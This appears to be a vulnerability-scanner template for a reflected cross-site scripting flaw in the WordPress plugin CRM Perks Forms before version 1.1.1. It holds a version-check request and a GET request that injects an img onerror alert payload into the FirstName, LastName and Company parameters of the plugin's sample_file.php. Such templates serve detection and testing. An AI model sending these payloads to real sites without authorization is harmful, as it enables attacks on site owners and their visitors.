name:CRM Perks Forms < 1.1.1 - Cross Site Scripting
author:r3Y3r53
severity:medium
description:|
The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting
GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1
Host:{{Hostname}}
- |
GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1